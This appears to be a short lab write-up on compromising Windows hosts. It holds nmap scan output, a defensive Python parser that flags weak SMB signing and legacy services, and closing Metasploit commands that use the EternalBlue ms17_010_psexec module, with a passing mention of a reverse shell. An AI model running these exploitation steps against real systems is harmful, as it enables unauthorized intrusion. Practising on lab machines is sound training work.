Infiltrating Windows

April 28, 2024

# Nmap 7.94 scan initiated Sat Apr 27 23:41:51 2024 as: nmap -sC -sV -oN nmap -vv 10.129.68.35
Increasing send delay for 10.129.68.35 from 0 to 5 due to 62 out of 206 dropped probes since last increase.
Increasing send delay for 10.129.68.35 from 5 to 10 due to 11 out of 13 dropped probes since last increase.
Increasing send delay for 10.129.68.35 from 10 to 20 due to 13 out of 41 dropped probes since last increase.
Nmap scan report for 10.129.68.35
Host is up, received syn-ack (0.34s latency).
Scanned at 2024-04-27 23:41:51 PST for 400s
Not shown: 990 closed tcp ports (conn-refused)
PORT     STATE SERVICE     REASON  VERSION
7/tcp    open  echo        syn-ack
9/tcp    open  discard?    syn-ack
13/tcp   open  daytime     syn-ack Microsoft Windows USA daytime
17/tcp   open  qotd        syn-ack Windows qotd (English)
19/tcp   open  chargen     syn-ack
80/tcp   open  http        syn-ack Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows
|_http-server-header: Microsoft-IIS/10.0
135/tcp  open  msrpc       syn-ack Microsoft Windows RPC
139/tcp  open  netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds syn-ack Windows 10 Pro 18363 microsoft-ds (workgroup: WORKGROUP)
2179/tcp open  vmrdp?      syn-ack
Service Info: Host: SHELLS-WIN10; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 57959/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 50733/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 25647/udp): CLEAN (Failed to receive data)
|   Check 4 (port 20860/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 2h20m05s, deviation: 4h02m30s, median: 4s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-04-27T15:48:07
|_  start_date: N/A
| smb-os-discovery: 
|   OS: Windows 10 Pro 18363 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: Shells-Win10
|   NetBIOS computer name: SHELLS-WIN10\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-04-27T08:48:08-07:00

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Apr 27 23:48:31 2024 -- 1 IP address (1 host up) scanned in 400.77 seconds
# Nmap 7.94 scan initiated Mon Apr 29 22:08:21 2024 as: nmap -sV -O -oN nmap-os -vv 10.129.201.97
Nmap scan report for 10.129.201.97
Host is up, received echo-reply ttl 127 (0.30s latency).
Scanned at 2024-04-29 22:08:21 PST for 32s
Not shown: 996 closed tcp ports (reset)
PORT    STATE SERVICE      REASON          VERSION
80/tcp  open  http         syn-ack ttl 127 Microsoft IIS httpd 10.0
135/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
139/tcp open  netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds syn-ack ttl 127 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Uptime guess: 0.003 days (since Mon Apr 29 22:04:08 2024)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Apr 29 22:08:53 2024 -- 1 IP address (1 host up) scanned in 32.20 seconds
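As an added defender-side example (not part of the original notes), the following Python script parses nmap normal (-oN) output like the scans above and flags what a hardening review would pick out of them: exposed legacy simple-TCP services, SMB signing that is not required, and risky HTTP methods. The embedded sample is constructed from a few lines of the first scan.

```python
import re

# Constructed sample: lines taken from the nmap -sC -sV output above.
SAMPLE_NMAP = """\
Nmap scan report for 10.129.68.35
PORT     STATE SERVICE     REASON  VERSION
7/tcp    open  echo        syn-ack
19/tcp   open  chargen     syn-ack
80/tcp   open  http        syn-ack Microsoft IIS httpd 10.0
|_  Potentially risky methods: TRACE
445/tcp  open  microsoft-ds syn-ack Windows 10 Pro 18363 microsoft-ds (workgroup: WORKGROUP)
| smb-security-mode:
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
"""

# Legacy "Simple TCP/IP Services" that have no business on a modern host.
LEGACY_SERVICES = {"echo", "discard", "daytime", "qotd", "chargen"}

def triage(report: str) -> dict:
    """Return hardening findings parsed from nmap normal (-oN) output."""
    findings = {"host": None, "open_ports": [], "legacy_services": [],
                "smb_signing_required": None, "risky_http_methods": []}
    for line in report.splitlines():
        m = re.match(r"Nmap scan report for (\S+)", line)
        if m:
            findings["host"] = m.group(1)
        m = re.match(r"(\d+)/tcp\s+open\s+(\S+)", line)
        if m:
            port, svc = int(m.group(1)), m.group(2)
            findings["open_ports"].append(port)
            if svc in LEGACY_SERVICES:
                findings["legacy_services"].append((port, svc))
        m = re.search(r"Potentially risky methods: (.+)", line)
        if m:
            findings["risky_http_methods"] = m.group(1).split()
        # smb2-security-mode is authoritative; only "enabled and required" is safe.
        m = re.search(r"Message signing (?:is )?(enabled and required|"
                      r"enabled but not required|disabled)", line)
        if m:
            findings["smb_signing_required"] = m.group(1) == "enabled and required"
        # Fall back to the SMB1 smb-security-mode line when no SMB2 result is present.
        if findings["smb_signing_required"] is None and "message_signing:" in line:
            findings["smb_signing_required"] = "required" in line
    return findings

if __name__ == "__main__":
    for key, value in triage(SAMPLE_NMAP).items():
        print(f"{key}: {value}")
```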

HERE IS THE ANSWER

I just have to use psexec instead of uploading a reverse shell via the web.


search eternal
use 1 (exploit/windows/smb/ms17_010_psexec)
options
set rhost 10.129.201.97
set lhost 10.10.15.241
